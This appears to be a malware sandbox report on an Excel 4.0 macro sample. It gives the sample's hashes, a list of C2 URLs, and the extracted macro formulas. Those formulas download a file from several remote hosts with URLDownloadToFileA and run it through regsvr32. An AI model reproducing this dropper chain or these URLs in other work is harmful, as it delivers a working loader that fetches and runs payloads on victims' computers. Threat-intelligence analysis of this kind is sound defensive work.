General

  • Target

    26ff5dcbf0911ce523e666dd5974dba67a08189704451097127f7298c3723c95

  • Size

    44KB

  • Sample

    240909-1pdt5asaqm

  • MD5

    198cc15bec1abaa15f45f1d4e497ddf2

  • SHA1

    931d0c6794ea4d195606086d871a329eecc0d840

  • SHA256

    26ff5dcbf0911ce523e666dd5974dba67a08189704451097127f7298c3723c95

  • SHA512

    d320ef279494c1a91ca0abc3cc5e89c13d32d1a8d9269803e643edd169fd70f31c90771ceb24234776bca4de0362b7f6e3e45b36612bd2cd336e1c4c4c2e2ec4

  • SSDEEP

    768:UCQvLUWK9y2fdc/buIgsqlkVw2WFc8SGnCu2JBgBkXrI34gIKJCBEdMlO2vJGx:BQv4Y2sb6yVwpFB1CuEge7tgIKJNyM

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://dan-bau.com/wp-includes/css/dist/h2plh7xZso/

https://advisereviews.com/wp-content/2NyZZiJ6KEzPPrbx/

https://aplicativos.xyz/apk/49Wq5MN/

http://www.equus.com/2i8yt/0kWhkppl8oTFCeYu9gS/

http://prevozkop.rs/qnov/n017r0EEa/

https://businessandhr.com/w/xrB/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dan-bau.com/wp-includes/css/dist/h2plh7xZso/","..\aew.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://advisereviews.com/wp-content/2NyZZiJ6KEzPPrbx/","..\aew.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aplicativos.xyz/apk/49Wq5MN/","..\aew.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.equus.com/2i8yt/0kWhkppl8oTFCeYu9gS/","..\aew.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://prevozkop.rs/qnov/n017r0EEa/","..\aew.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://businessandhr.com/w/xrB/","..\aew.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aew.ocx") =RETURN()

Targets

    • Target

      26ff5dcbf0911ce523e666dd5974dba67a08189704451097127f7298c3723c95

    • Size

      44KB

    • MD5

      198cc15bec1abaa15f45f1d4e497ddf2

    • SHA1

      931d0c6794ea4d195606086d871a329eecc0d840

    • SHA256

      26ff5dcbf0911ce523e666dd5974dba67a08189704451097127f7298c3723c95

    • SHA512

      d320ef279494c1a91ca0abc3cc5e89c13d32d1a8d9269803e643edd169fd70f31c90771ceb24234776bca4de0362b7f6e3e45b36612bd2cd336e1c4c4c2e2ec4

    • SSDEEP

      768:UCQvLUWK9y2fdc/buIgsqlkVw2WFc8SGnCu2JBgBkXrI34gIKJCBEdMlO2vJGx:BQv4Y2sb6yVwpFB1CuEge7tgIKJNyM

    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks